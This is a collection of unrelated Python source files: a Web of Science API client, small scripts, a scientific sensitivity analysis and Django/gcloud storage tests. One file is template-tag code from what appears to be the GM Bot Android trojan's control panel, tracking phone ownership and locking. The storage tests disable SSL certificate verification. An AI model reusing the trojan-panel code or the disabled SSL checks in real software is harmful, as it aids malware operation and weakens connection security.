if not self._SID:
raise RuntimeError('Session closed. Invoke connect() before.')
return fn(self, *args, **kwargs)
return _fn
def _premium(fn):
"""Premium decorator for APIs that require premium access level."""
@_functools.wraps(fn)
def _fn(self, *args, **kwargs):
if self._lite:
raise RuntimeError('Premium API not available in lite access.')
return fn(self, *args, **kwargs)
return _fn
@staticmethod
def make_retrieveParameters(offset=1, count=100, name='RS', sort='D'):
"""Create retrieve parameters dictionary to be used with APIs.
:count: Number of records to display in the result. Cannot be less than
0 and cannot be greater than 100. If count is 0 then only the
summary information will be returned.
:offset: First record in results to return. Must be greater than zero
:name: Name of the field to order by. Use a two-character abbreviation
to specify the field ('AU': Author, 'CF': Conference Title,
'CG': Page, 'CW': Source, 'CV': Volume, 'LC': Local Times Cited,
'LD': Load Date, 'PG': Page, 'PY': Publication Year, 'RS':
Relevance, 'SO': Source, 'TC': Times Cited, 'VL': Volume)
:sort: Must be A (ascending) or D (descending). The sort parameter can
only be D for Relevance and TimesCited.
"""
return _OrderedDict([
('firstRecord', offset),
('count', count),
('sortField', _OrderedDict([('name', name), ('sort', sort)]))
])
def connect(self):
"""Authenticate to WOS and set the SID cookie."""
if not self._SID:
self._SID = self._auth.service.authenticate()
print('Authenticated (SID: %s)' % self._SID)
self._search.set_options(headers={'Cookie': 'SID="%s"' % self._SID})
self._auth.options.headers.update({'Cookie': 'SID="%s"' % self._SID})
return self._SID
def close(self):
"""The close operation loads the session if it is valid and then closes
it and releases the session seat. All the session data are deleted and
become invalid after the request is processed. The session ID can no
longer be used in subsequent requests."""
if self._SID:
self._auth.service.closeSession()
self._SID = None
    @_api
    def search(self, query, count=5, offset=1, editions=None,
               symbolicTimeSpan=None, timeSpan=None, retrieveParameters=None):
        """The search operation submits a search query to the specified
        database edition and retrieves data. This operation returns a query ID
        that can be used in subsequent operations to retrieve more records.
        :query: User query for requesting data. The query parser will return
                errors for invalid queries
        :count: Number of records to display in the result. Cannot be less than
                0 and cannot be greater than 100. If count is 0 then only the
                summary information will be returned.
        :offset: First record in results to return. Must be greater than zero
        :editions: List of editions to be searched. If None, user permissions
                   will be substituted.
                   Fields:
                   collection - Name of the collection
                   edition - Name of the edition
        :symbolicTimeSpan: This element specifies a range of load dates. The
                           load date is the date when a record was added to a
                           database. If symbolicTimeSpan is specified, the
                           timeSpan parameter must be omitted. If timeSpan and
                           symbolicTimeSpan are both omitted, then the maximum
                           publication date time span will be inferred from the
                           editions data.
                           Valid values:
                           '1week' - Specifies to use the end date as today and
                                     the begin date as 1 week prior to today.
                           '2week' - Specifies to use the end date as today and
                                     the begin date as 2 week prior to today.
                           '4week' - Specifies to use the end date as today and
                                     the begin date as 4 week prior to today.
        :timeSpan: This element specifies a range of publication dates.
                   If timeSpan is used, the symbolicTimeSpan parameter must be
                   omitted. If timeSpan and symbolicTimeSpan are both omitted,
                   then the maximum time span will be inferred from the
                   editions data.
                   Fields:
                   begin - Beginning date for this search. Format: YYYY-MM-DD
                   end - Ending date for this search. Format: YYYY-MM-DD
        :retrieveParameters: Retrieve parameters. If omitted the result of
                             make_retrieveParameters(offset, count, 'RS', 'D')
                             is used.
        """
        # OrderedDict presumably preserves the element order the SOAP schema
        # expects -- keep the ordering as-is (TODO confirm against the WSDL).
        return self._search.service.search(
            queryParameters=_OrderedDict([
                ('databaseId', 'WOS'),
                ('userQuery', query),
                ('editions', editions),
                ('symbolicTimeSpan', symbolicTimeSpan),
                ('timeSpan', timeSpan),
                ('queryLanguage', 'en')
            ]),
            retrieveParameters=(retrieveParameters or
                                self.make_retrieveParameters(offset, count))
        )
    @_api
    def retrieve(self, queryId, count=100, offset=1, retrieveParameters=None):
        """The retrieve operation submits a query returned by a previous
        search, citingArticles, relatedRecords, or retrieveById operation.
        However, different retrieval parameters may be used to modify the
        output. For example, if a search operation returns five records sorted
        by times cited, a subsequent retrieve operation could run the same
        search against the same database and edition but return 10 records
        sorted by relevance.
        This operation is also useful for overcoming the retrieval limit of 100
        records per query. For example, a search operation may find 220
        records, as revealed by the content of the recordsFound element, but it
        returns only records 1-100. A subsequent retrieve operation could
        return records 101-200 and a third retrieve operation the remaining 20.
        :queryId: The query ID from a previous search
        :count: Number of records to display in the result. Cannot be less than
                0 and cannot be greater than 100. If count is 0 then only the
                summary information will be returned.
        :offset: First record in results to return. Must be greater than zero
        :retrieveParameters: Retrieve parameters. If omitted the result of
                             make_retrieveParameters(offset, count, 'RS', 'D')
                             is used.
        """
        # `or` (not `is None`) means a falsy retrieveParameters is replaced too.
        return self._search.service.retrieve(
            queryId=queryId,
            retrieveParameters=(retrieveParameters or
                                self.make_retrieveParameters(offset, count))
        )
    @_api
    def retrieveById(self, uid, count=100, offset=1, retrieveParameters=None):
        """The retrieveById operation returns records identified by unique
        identifiers. The identifiers are specific to each database.
        :uid: Thomson Reuters unique record identifier
        :count: Number of records to display in the result. Cannot be less than
                0 and cannot be greater than 100. If count is 0 then only the
                summary information will be returned.
        :offset: First record in results to return. Must be greater than zero
        :retrieveParameters: Retrieve parameters. If omitted the result of
                             make_retrieveParameters(offset, count, 'RS', 'D')
                             is used.
        """
        return self._search.service.retrieveById(
            databaseId='WOS',
            uid=uid,
            queryLanguage='en',
            retrieveParameters=(retrieveParameters or
                                self.make_retrieveParameters(offset, count))
        )
    @_api
    @_premium
    def citedReferences(self, uid, count=100, offset=1,
                        retrieveParameters=None):
        """The citedReferences operation returns references cited by an article
        identified by a unique identifier. You may specify only one identifier
        per request.
        :uid: Thomson Reuters unique record identifier
        :count: Number of records to display in the result. Cannot be less than
                0 and cannot be greater than 100. If count is 0 then only the
                summary information will be returned.
        :offset: First record in results to return. Must be greater than zero
        :retrieveParameters: Retrieve parameters. If omitted the result of
                             make_retrieveParameters(offset, count, 'RS', 'D')
                             is used.
        """
        return self._search.service.citedReferences(
            databaseId='WOS',
            uid=uid,
            queryLanguage='en',
            retrieveParameters=(retrieveParameters or
                                self.make_retrieveParameters(offset, count))
        )
    @_api
    @_premium
    def citedReferencesRetrieve(self, queryId, count=100, offset=1,
                                retrieveParameters=None):
        """The citedReferencesRetrieve operation submits a query returned by a
        previous citedReferences operation.
        This operation is useful for overcoming the retrieval limit of 100
        records per query. For example, a citedReferences operation may find
        106 cited references, as revealed by the content of the recordsFound
        element, but it returns only records 1-100. You could perform a
        subsequent citedReferencesRetrieve operation to obtain records 101-106.
        :queryId: The query ID from a previous citedReferences operation
        :count: Number of records to display in the result. Cannot be less than
                0 and cannot be greater than 100. If count is 0 then only the
                summary information will be returned.
        :offset: First record in results to return. Must be greater than zero
        :retrieveParameters: Retrieve parameters. If omitted the result of
                             make_retrieveParameters(offset, count, 'RS', 'D')
                             is used.
        """
        return self._search.service.citedReferencesRetrieve(
            queryId=queryId,
            retrieveParameters=(retrieveParameters or
                                self.make_retrieveParameters(offset, count))
        )
    @_api
    @_premium
    def citingArticles(self, uid, count=100, offset=1, editions=None,
                       timeSpan=None, retrieveParameters=None):
        """The citingArticles operation finds citing articles for the article
        specified by unique identifier. You may specify only one identifier per
        request. Web of Science Core Collection (WOS) is the only valid
        database for this operation.
        :uid: A unique item identifier. It cannot be None or empty string.
        :count: Number of records to display in the result. Cannot be less than
                0 and cannot be greater than 100. If count is 0 then only the
                summary information will be returned.
        :offset: First record in results to return. Must be greater than zero
        :editions: List of editions to be searched. If None, user permissions
                   will be substituted.
                   Fields:
                   collection - Name of the collection
                   edition - Name of the edition
        :timeSpan: This element specifies a range of publication dates.
                   If timeSpan is null, then the maximum time span will be
                   inferred from the editions data.
                   Fields:
                   begin - Beginning date for this search. Format: YYYY-MM-DD
                   end - Ending date for this search. Format: YYYY-MM-DD
        :retrieveParameters: Retrieve parameters. If omitted the result of
                             make_retrieveParameters(offset, count, 'RS', 'D')
                             is used.
        """
        return self._search.service.citingArticles(
            databaseId='WOS',
            uid=uid,
            editions=editions,
            timeSpan=timeSpan,
            queryLanguage='en',
            retrieveParameters=(retrieveParameters or
                                self.make_retrieveParameters(offset, count))
        )
    @_api
    @_premium
    def relatedRecords(self, uid, count=100, offset=1, editions=None,
                       timeSpan=None, retrieveParameters=None):
        """The relatedRecords operation finds Related Records for the article
        specified by unique identifier. Related Records share cited references
        with the specified record. The operation returns the parent record
        along with the Related Records. The total number of Related Records for
        the parent record is shown at the end of the response. Use the retrieve
        parameter count to limit the number of Related Records returned.
        :uid: A unique item identifier. It cannot be None or empty string.
        :count: Number of records to display in the result. Cannot be less than
                0 and cannot be greater than 100. If count is 0 then only the
                summary information will be returned.
        :offset: First record in results to return. Must be greater than zero
        :editions: List of editions to be searched. If None, user permissions
                   will be substituted.
                   Fields:
                   collection - Name of the collection
                   edition - Name of the edition
        :timeSpan: This element specifies a range of publication dates.
                   If timeSpan is null, then the maximum time span will be
                   inferred from the editions data.
                   Fields:
                   begin - Beginning date for this search. Format: YYYY-MM-DD
                   end - Ending date for this search. Format: YYYY-MM-DD
        :retrieveParameters: Retrieve parameters. If omitted the result of
                             make_retrieveParameters(offset, count, 'RS', 'D')
                             is used.
        """
        return self._search.service.relatedRecords(
            databaseId='WOS',
            uid=uid,
            editions=editions,
            timeSpan=timeSpan,
            queryLanguage='en',
            retrieveParameters=(retrieveParameters or
                                self.make_retrieveParameters(offset, count))
        )
| 2.625 | 3 |
Cursos-Extras/Python/ex035.py | talessantos49/Primeiros_Passos | 0 | 12765109 | <gh_stars>0
def eh_triangulo(a, b, c):
    """Return True when sides a, b, c can form a (non-degenerate) triangle.

    Triangle inequality: each side must be strictly shorter than the sum of
    the other two.  The original chain of comparisons required all three
    sides to be distinct, so valid isosceles/equilateral triangles (e.g.
    2, 2, 3) were wrongly reported as impossible.
    """
    return a + b > c and a + c > b and b + c > a


if __name__ == "__main__":
    n1 = float(input('Insira o primeiro valor desejado: '))
    n2 = float(input('Insira o segundo valor desejado: '))
    n3 = float(input('Insira o terceiro valor desejado: '))
    if eh_triangulo(n1, n2, n3):
        print('É possivel formar um triangulo com esses valores.')
    else:
        print('Não é possivel formar um triangulo com esses valores.')
| 3.90625 | 4 |
code/4.1_make_index_multi.py | ceumicrodata/respect-trade-similarity | 1 | 12765110 | <reponame>ceumicrodata/respect-trade-similarity
import glob
import pandas as pd
from multiprocessing import Pool
# All per-year index files, e.g. '../temp/index/data/index_EXP_2001.csv'.
file_list = glob.glob('../temp/index/data/index_??P_20??.csv')
#print(len(file_list))
def colnames(df):
    """Normalise the header of one index CSV to the three canonical columns.

    ``df`` is a CSV file *path* (not a DataFrame, despite the name); the
    file is rewritten in place with the canonical header.
    """
    try:
        cols = ["DECLARANT_ISO","PARTNER_ISO","TCI"]
        data = pd.read_csv(df)
        # Raises ValueError when the file does not have exactly 3 columns
        # (e.g. an index column written by a previous run of this script).
        data.columns=cols
        data.to_csv(df)
    except ValueError:
        # Hungarian: "there is one more column" -- file left untouched.
        # Narrowed from a bare `except:` so real I/O errors are not hidden.
        print("van meg 1 oszlop")
# Rename the columns of every CSV in parallel.
# NOTE(review): the Pool is created at module level with no
# `if __name__ == "__main__":` guard -- this breaks on spawn-based start
# methods (Windows, macOS default); confirm this only runs on fork/Linux.
pool = Pool(processes=34)
pool.map(colnames,file_list)
pool.close()
pool.join()
#Select those which contain the export data
file_list_EXP = [db for db in file_list if "EXP" in db]
file_list_IMP = [db for db in file_list if "IMP" in db]
#print(file_list_IMP,file_list_EXP)
#print("IMP", len(file_list_IMP))
#print("EXP", len(file_list_EXP))
lista = [file_list_EXP,file_list_IMP]
def make_index(file_list):
    """Concatenate one flow's yearly index CSVs into a single wide table
    (one column per year) and write it under ../temp/index/dirty/."""
    # f[-8:-4] extracts the year from names like 'index_EXP_2001.csv';
    # FILE then becomes the pivot column.
    data = pd.concat([pd.read_csv(f).rename(columns=lambda x: x.split('_')[0]).assign(FILE=f[-8:-4]) for f in file_list])
    #data.columns = ["DESCLARANT","PARTNER","TCI"]
    data = data.pivot_table(index=['DECLARANT','PARTNER'],columns='FILE')
    # file_list[0][-12:-8] is the flow tag ('EXP_' / 'IMP_') from the same
    # naming scheme.
    data.to_csv('../temp/index/dirty/INDEX_'+file_list[0][-12:-8]+'.csv')
    # new content
    #print("new content")
    # Dead code below: a bare string literal, never executed; kept verbatim.
    """
    data = data.iloc[:,:19].drop(index=[0,1]).reset_index(drop=True).T.reset_index(drop=True).T
    cols = ["DECLARANT","PARTNER"] + [ "TCI_"+str(x) for x in range(2001,2018)]
    data.columns = cols
    print("generate new df")
    new_df = pd.DataFrame(list(product(data.DECLARANT.unique(), data.PARTNER.unique())), columns=["DECLARANT","PARTNER"])
    new_df = new_df.loc[new_df["DECLARANT"]!=new_df["PARTNER"]]
    print("merging")
    merged = pd.merge(new_df,data, how="left",on=["DECLARANT","PARTNER"]) #.drop("Unnamed: 0",axis=1)
    merged.to_csv("../output/TC_"+db[-14:])
    """
# One worker per flow (exports, imports); each builds its own wide index.
pool = Pool(processes=2)
pool.map(make_index,lista)
pool.close()
pool.join()
| 2.640625 | 3 |
functions/user.py | Katolus/functions | 4 | 12765111 | """Holds functions that ask a user for input"""
import warnings
from typing import List
import typer
from functions import logs
from functions import styles
from functions.config.models import FunctionConfig
from functions.constants import ConfigName
def ask(question: str, default: str = None, options: List[str] = None) -> str:
    """Prompt the user for a free-text answer in the console.

    When *options* is given, it is appended (highlighted) to the prompt text.
    """
    prompt_text = question
    if options:
        prompt_text += f"{styles.yellow(' Options')}[{', '.join(options)}]"
    return typer.prompt(prompt_text, default=default)
def confirm(question: str, default: bool = False) -> bool:
    """Ask the user a yes/no question in the console and return the answer."""
    answer: bool = typer.confirm(question, default=default)
    return answer
def confirm_abort(question: str) -> bool:
    """Yes/no console prompt that aborts the CLI run when the user declines."""
    answer: bool = typer.confirm(question, abort=True)
    return answer
def inform(msg: str, log: bool = True) -> None:
    """Show *msg* to the user, routed through the log by default."""
    if not log:
        typer.echo(msg)
        return
    logs.info(logs.remove_empty_lines_from_string(msg))
def warn(msg: str, log: bool = True) -> None:
    """Warn the user, either via the log (default) or a Python warning."""
    if not log:
        warnings.warn(f"{styles.yellow('WARNING: ')}{msg}")
        return
    logs.warning(logs.remove_empty_lines_from_string(msg))
def fail(msg: str, log: bool = True) -> None:
    """Report a failed execution to the user (via the log by default)."""
    if not log:
        warnings.warn(msg)
        return
    logs.error(logs.remove_empty_lines_from_string(msg))
def prompt_to_save_config(config: FunctionConfig) -> None:
    """Offer to persist *config* in the function's own directory."""
    question = (
        f"Do you want to store the configuration file ({ConfigName.BASE}) "
        f"in the function's directory ({config.path})?"
    )
    if confirm(question, default=True):
        config.save()
| 3.671875 | 4 |
formulaic/__init__.py | jzaleski/simpleforms | 2 | 12765112 | __version__ = '0.0.1.dev1'
from formulaic.attributes import (
Attribute,
BooleanAttribute,
FloatAttribute,
IntegerAttribute,
LongAttribute,
StringAttribute,
TextAttribute,
UUIDAttribute,
)
from formulaic.formatters import Formatter
from formulaic.models import Model
from formulaic.persistors import (
Persistor,
SQLPersistor,
SQLitePersistor,
)
from formulaic.triggers import Trigger
from formulaic.types import Type
from formulaic.validators import Validator
| 1.515625 | 2 |
REGIR/Biochemical_applications/3_RNA_transcription (Fig.4)/3_RNA_sensitivity (Fig. 4D).py | Aurelien-Pelissier/REGIR | 0 | 12765113 | <gh_stars>0
import numpy as np
import matplotlib.pyplot as plt
from SALib.sample import saltelli
from SALib.analyze import sobol
#https://salib.readthedocs.io/en/latest/
from RNA_model import Gillespie_kinetics
# Number of Gillespie runs per sampled parameter set.
N_simulations = 200
# Base sample size handed to SALib's saltelli.sample.
sensitivity_res = 64
# False -> reuse the cached 'sensitivity_analysis.npy' instead of
# re-running all simulations.
recompute_sensitivity = False
class param_opt:
    """Parameter-optimisation bookkeeping.

    NOTE(review): not referenced anywhere in this script -- presumably kept
    for compatibility with a sibling script; confirm before removing.
    """
    n_iteration = 100
    current_iter = 0
    use_already_computed_results = True
def main():
    """Run the Sobol sensitivity analysis with the reference rate constants."""
    # 2 - sensitivity analysis
    rate_on, rate_off, rate_prod = 1, 1, 50
    Sobol_sensitivity_analysis(rate_on, rate_off, rate_prod)
def Sobol_sensitivity_analysis(r_on, r_off, r_prod):
    """
    sensitivity of the coefficient of variation (CV) of mature mRNA
    (SD divided by the mean) to small perturbations.
    The CV is averaged over the cell cycle.
    Sensitivity of a parameter r is defined formally as Sr = r/CV * dCV/dr,
    meaning that a 1% change in the value of parameter r leads to Sr% change in CV
    See https://en.wikipedia.org/wiki/Variance-based_sensitivity_analysis
    """
    rmin = min(1,np.min([r_on, r_off, r_prod]))
    Tend = 5/rmin
    # Rate parameters vary +-30% around the reference; shape parameters in [2, 10].
    problem = {
        'num_vars': 6,
        'names': [r'$\lambda_{on}$', r'$\lambda_{off}$', r'$\lambda_{prod}$', r'$\alpha_{on}$', r'$\alpha_{off}$', r'$\alpha_{prod}$'],
        'bounds': [[r_on*0.7, r_on*1.3],[r_off*0.7, r_off*1.3],[r_prod*0.7, r_prod*1.3],[2, 10],[2, 10],[2, 10]]
    }
    if recompute_sensitivity:
        # Generate samples
        param_values = saltelli.sample(problem, sensitivity_res, calc_second_order=False)
        n_sim_tot = len(param_values)
        def evaluate_Gillespie(values):
            # One row per parameter set: [mean, CV, Entropy, Fano].
            Y = np.empty((values.shape[0],4))
            for i, X in enumerate(values):
                print(' Simulation %s/%s ...' % (i+1,n_sim_tot))
                param_list = dict()
                param_list['r_deg'] = 1
                param_list['r_on'] = X[0]
                param_list['r_off'] = X[1]
                param_list['r_prod'] = X[2]
                param_list['alpha_on'] = X[3]
                param_list['alpha_off'] = X[4]
                param_list['alpha_prod'] = X[5]
                param_list['Tend'] = Tend
                print(' r_on: %.2f, r_off: %.2f, r_prod: %.2f, \n alpha_on: %.2f, alpha_off: %.2f, alpha_prod: %.2f' % (param_list['r_on'],param_list['r_off'],param_list['r_prod'],param_list['alpha_on'],param_list['alpha_off'],param_list['alpha_prod']))
                mean, CV, Entropy, Fano, _ = Gillespie_kinetics(param_list, plot = False, N_simulations = N_simulations)
                Y[i,:] = np.array([mean, CV, Entropy, Fano])
            return Y
        # Run model on all values
        Y = evaluate_Gillespie(param_values)
        np.save('sensitivity_analysis.npy',Y)
    else:
        Y = np.load('sensitivity_analysis.npy')
    # BUGFIX: labels must follow the column order of Y, which is filled as
    # [mean, CV, Entropy, Fano] above; the original list swapped the last two
    # and mislabelled the Entropy and Fano analyses.
    measures = ['mean','CV','Entropy','Fano']
    for i in range(4):
        # Perform analysis
        Si = sobol.analyze(problem, Y[:,i], calc_second_order=False)
        # Returns a dictionary with keys 'S1', 'S1_conf', 'ST', and 'ST_conf'
        # (first and total-order indices with bootstrap confidence intervals)
        print(' %s sensitivity analysis:' % measures[i])
        print(' ', Si['S1'])
        print(' ', Si['S1_conf'])
        plt.figure(figsize = (5.5,4))
        plt.errorbar(np.arange(problem['num_vars']), Si['S1'], yerr=Si['S1_conf'], fmt = 'o', color = 'black', capsize=5, elinewidth=2, markeredgewidth=2, markersize = 10, markerfacecolor = 'red')
        plt.xticks(ticks = np.arange(problem['num_vars']), labels = problem['names'], rotation = 90, size = 19)
        plt.axhline(y=0, color = 'black', linestyle = '--')
        plt.xlim(-0.5,5.5)
        plt.ylabel('Variance-based Sensitivity')
        plt.show()
if __name__ == "__main__":
    # Use a larger default font for all generated figures.
    plt.rcParams.update({'font.size': 16})
    main()
Trojan.Android.GM/gmbot/apps/smsg_r/smsapp/templatetags/mytags.py | 010001111/Vx-Suites | 2 | 12765114 | <gh_stars>1-10
from django import template
from django.conf import settings
from django.utils.safestring import mark_safe
from django_countries import conf
from django.template import Node
import pycountry
try:
from urllib import parse as urlparse
except ImportError:
import urlparse # Python 2
register = template.Library()
@register.simple_tag
def is_active(request, pattern):
    """Return 'active' when *pattern* matches the current request path."""
    import re
    matched = re.search(pattern, request.path)
    return 'active' if matched else ''
@register.simple_tag
def is_phone_available(request, phone):
    """Return a 'disabled' HTML attribute when the phone is claimed by
    another user.

    @type request: django.http.request.HttpRequest
    @type phone: PhoneData
    """
    owned_by_someone_else = (phone.owner_id is not None
                             and request.user.id != phone.owner_id)
    return " disabled='1'" if owned_by_someone_else else ""
@register.simple_tag
def is_phone_owner_by_user(request, phone):
    """Return a 'checked' HTML attribute when the current user owns the phone.

    @type request: django.http.request.HttpRequest
    @type phone: PhoneData
    """
    return ' checked="1"' if request.user.id == phone.owner_id else ''
@register.simple_tag
def is_phone_locked(request, phone):
    """Return a 'checked' HTML attribute when the phone is locked.

    @type request: django.http.request.HttpRequest
    @type phone: PhoneData
    """
    return ' checked="1"' if phone.locked else ''
@register.filter
def country_code_to_name(code):
    """
    Returns country name from its code
    @param code: Country 2-letters code
    @type code: str
    @return: Country full name
    @rtype: str
    """
    try:
        # NOTE(review): 'alpha2' is the old pycountry keyword; recent
        # pycountry releases use 'alpha_2' and would raise TypeError here --
        # confirm which version is pinned.
        country = pycountry.countries.get(alpha2=code)
        if country:
            return country.name
    # Unknown code: echo the input back.
    except KeyError:
        return code
    # Lookup succeeded but returned a falsy value: empty string (note the
    # asymmetry with the KeyError path above, which returns the code).
    return ""
@register.filter
def country_code_to_flag(code):
    """Return an <img> tag for the country's flag, or '' for a falsy code.

    @param code: Country 2-letters code
    @type code: str
    @return: HTML code to render
    @rtype: str
    """
    # TODO: flags for unknown countries.
    if not code:
        return ""
    template = conf.Settings.COUNTRIES_FLAG_URL
    flag_path = template.format(code_upper=code, code=code.lower())
    absolute_url = urlparse.urljoin(settings.STATIC_URL, flag_path)
    return mark_safe('<img src="{0}"/>'.format(absolute_url))
class PrettyPrintNode(Node):
    """Template node that re-renders its wrapped content through
    BeautifulSoup's pretty-printer."""
    def __init__(self, nodelist):
        # nodelist: parsed template nodes between {% pretty %}/{% endpretty %}.
        self.nodelist = nodelist
    def render(self, context):
        # Imported lazily so bs4 is only required when the tag is used.
        from bs4 import BeautifulSoup
        # NOTE(review): no explicit parser argument -- recent bs4 versions
        # pick one themselves and emit a warning; consider 'html.parser'.
        html = BeautifulSoup(self.nodelist.render(context))
        return html.prettify()
@register.tag()
def pretty(parser, token):
    """{% pretty %}...{% endpretty %}: pretty-print the enclosed HTML."""
    inner_nodes = parser.parse(('endpretty',))
    parser.delete_first_token()
    return PrettyPrintNode(inner_nodes)
| 2.28125 | 2 |
def main(request, response):
    """WPT handler: expose the request's Referer header as a JS global."""
    referrer = request.headers.get("referer", "")
    headers = [("Content-Type", "text/javascript")]
    body = "window.referrer = '" + referrer + "'"
    return (200, headers, body)
| 2.0625 | 2 |
work/apidoc/schema1.py | haizaar/crossbar-examples | 97 | 12765116 | <reponame>haizaar/crossbar-examples
from jsonschema import validate
from pprint import pprint
# Minimal jsonschema demo: an inline schema with two typed properties.
schema = {
    "type" : "object",
    "properties" : {
        "price" : {"type" : "number"},
        "name" : {"type" : "string"},
    },
}
# Valid instance -- raises nothing.
validate({"name" : "Eggs", "price" : 34.99}, schema)
#validate({"name" : "Eggs", "price" : "Invalid"}, schema)
import json
# Load and display the real API schema from disk (must exist in the CWD).
with open('api.json') as f:
    schema = json.loads(f.read())
pprint(schema)
| 2.6875 | 3 |
tests/test_class.py | Superbalist/django-gcloud-storage | 0 | 12765117 | # coding=utf-8
from __future__ import unicode_literals
import datetime
import ssl
from tempfile import TemporaryFile
import gcloud.exceptions
import pytest
from django.core.exceptions import SuspiciousFileOperation
from django.utils import six
from django.utils.crypto import get_random_string
from django_gcloud_storage import safe_join, remove_prefix, GCloudFile
def urlopen(*args, **kwargs):
    """Py2/Py3-compatible ``urlopen`` that skips SSL certificate
    verification where the runtime supports it."""
    try:
        from urllib.request import urlopen
    except ImportError:
        from urllib2 import urlopen  # Python 2
    try:
        # Ignore SSL errors (won't work on Py3.3 but can be ignored there)
        kwargs["context"] = ssl._create_unverified_context()
    except AttributeError:  # Py3.3
        pass
    return urlopen(*args, **kwargs)
@pytest.fixture
def storage(storage_object):
    """Provide a clean storage backend: wipe any blobs left over from a
    previous run before handing the object to the test."""
    # Make sure there are no test files due to a previous test run
    from django_gcloud_storage import prepare_name
    for blob in storage_object.bucket.list_blobs():
        storage_object.bucket.delete_blob(prepare_name(blob.name))
    return storage_object
# noinspection PyClassHasNoInit,PyMethodMayBeStatic
class TestSafeJoin:
    """Characterization tests for safe_join: path joining, normalization,
    and rejection of base-escaping paths."""
    def test_should_join_urls(self):
        assert safe_join("test", "index.html") == "test/index.html"
    def test_should_not_break_on_slash_on_base(self):
        assert safe_join("test/", "index.html") == "test/index.html"
        assert safe_join("test///", "index.html") == "test/index.html"
    def test_should_enforce_no_starting_slash_on_base(self):
        assert safe_join("/test", "index.html") == "test/index.html"
        assert safe_join("////test", "index.html") == "test/index.html"
    def test_should_resolve_dots_to_absolute_path(self):
        assert safe_join("test", "/test/../index.html") == "test/index.html"
    def test_should_resolve_multiple_slashes(self):
        assert safe_join("test", "/test//abc////index.html") == "test/test/abc/index.html"
        assert safe_join("test///", "///test//abc////index.html") == "test/test/abc/index.html"
    def test_should_not_allow_escaping_base_path(self):
        # '..' that would climb above the base must raise.
        with pytest.raises(SuspiciousFileOperation):
            safe_join("test", "../index.html")
        with pytest.raises(SuspiciousFileOperation):
            safe_join("test", "/../index.html")
    def test_should_work_with_bytes(self):
        assert safe_join(b"test", "index.html") == "test/index.html"
        assert safe_join("test", b"index.html") == "test/index.html"
        assert safe_join(b"test", b"index.html") == "test/index.html"
    def test_should_work_with_unicode_characters(self):
        assert safe_join("test", "brathähnchen.html") == "test/brathähnchen.html"
    def test_should_normalize_system_dependant_slashes(self):
        assert safe_join("test", "windows\\slashes") == "test/windows/slashes"
        assert safe_join("test", "windows\\/slashes") == "test/windows/slashes"
        assert safe_join("windows\\", "slashes") == "windows/slashes"
def test_remove_prefix_function():
    """remove_prefix strips the prefix only when it starts the string."""
    assert remove_prefix("/a/b/c/", "/a/") == "b/c/"
    # Prefix not at the start: input returned unchanged.
    assert remove_prefix("/a/b/c/", "/b/") == "/a/b/c/"
# noinspection PyMethodMayBeStatic,PyTypeChecker
class TestGCloudFile:
    """Unit tests for GCloudFile's local spooled-tempfile behavior (blob
    upload is stubbed out)."""
    # NOTE(review): the stub lambda takes no arguments; a real
    # self._update_blob() call would fail -- presumably _update_blob is never
    # invoked on these code paths. Confirm against GCloudFile.
    TEST_CONTENT = "Brathähnchen".encode("utf8")
    def test_should_be_able_to_read_and_write(self, monkeypatch):
        monkeypatch.setattr(GCloudFile, "_update_blob", lambda: None)
        f = GCloudFile(None)
        f.open("w")
        assert f.read() == (b"" if six.PY3 else "")
        f.write(self.TEST_CONTENT)
        f.seek(0)
        assert f.read() == self.TEST_CONTENT
    def test_small_temporary_files_should_not_be_rolled_over_to_disk(self, monkeypatch):
        monkeypatch.setattr(GCloudFile, "_update_blob", lambda: None)
        f = GCloudFile(None, maxsize=1000)
        # Exactly at maxsize: stays in memory.
        f.write("a".encode("utf8") * 1000)
        assert not f._tmpfile._rolled
    def test_large_temporary_files_should_be_rolled_over_to_disk(self, monkeypatch):
        monkeypatch.setattr(GCloudFile, "_update_blob", lambda: None)
        f = GCloudFile(None, maxsize=1000)
        # One byte over maxsize: spills to disk.
        f.write("a".encode("utf8") * 1001)
        assert f._tmpfile._rolled
    def test_modified_files_should_be_marked_as_dirty(self, monkeypatch):
        monkeypatch.setattr(GCloudFile, "_update_blob", lambda: None)
        f = GCloudFile(None)
        f.write(self.TEST_CONTENT)
        assert f._dirty
# noinspection PyClassHasNoInit,PyMethodMayBeStatic
class TestGCloudStorageClass:
    """Integration tests running against a real GCS bucket (via the
    `storage` fixture); random suffixes avoid collisions between runs."""
    TEST_FILE_NAME = "test_file_" + get_random_string(6)
    TEST_FILE_NAME_UNICODE = "test_file_陰陽_" + get_random_string(6)
    TEST_FILE_CONTENT = "Brathähnchen".encode("utf8")
    def upload_test_file(self, storage, name, content):
        # Helper: save `content` (str or bytes) under `name` via the backend.
        if six.PY3 and isinstance(content, str):
            content = content.encode("utf8")
        with TemporaryFile() as testfile:
            testfile.write(content)
            testfile.seek(0)
            storage.save(name, testfile)
    def test_should_create_blob_at_correct_path(self, storage):
        with TemporaryFile() as testfile:
            testfile.write(self.TEST_FILE_CONTENT)
            testfile.seek(0)
            storage_path = storage.save(self.TEST_FILE_NAME, testfile)
            assert storage_path == self.TEST_FILE_NAME
    def test_should_create_a_valid_client_object(self, storage):
        with pytest.raises(gcloud.exceptions.NotFound):
            storage.client.get_bucket("some_random_bucket_name_that_doesnt_exist")
    def test_should_create_a_valid_bucket_object(self, storage):
        assert storage.bucket.exists()
    def test_should_be_able_to_save_and_open_files(self, storage):
        self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
        f = storage.open(self.TEST_FILE_NAME)
        assert f.read() == self.TEST_FILE_CONTENT
    def test_should_return_created_time(self, storage):
        self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
        assert isinstance(storage.created_time(self.TEST_FILE_NAME), datetime.datetime)
    def test_should_return_modified_time(self, storage):
        self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
        assert isinstance(storage.modified_time(self.TEST_FILE_NAME), datetime.datetime)
    def test_should_be_able_to_delete_files(self, storage):
        self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
        storage.delete(self.TEST_FILE_NAME)
        # Should not raise an exception by gcloud
        assert storage.delete("missing_file") is None
    def test_exists_method(self, storage):
        assert not storage.exists(self.TEST_FILE_NAME)
        self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
        assert storage.exists(self.TEST_FILE_NAME)
    def test_should_return_correct_file_size(self, storage):
        self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
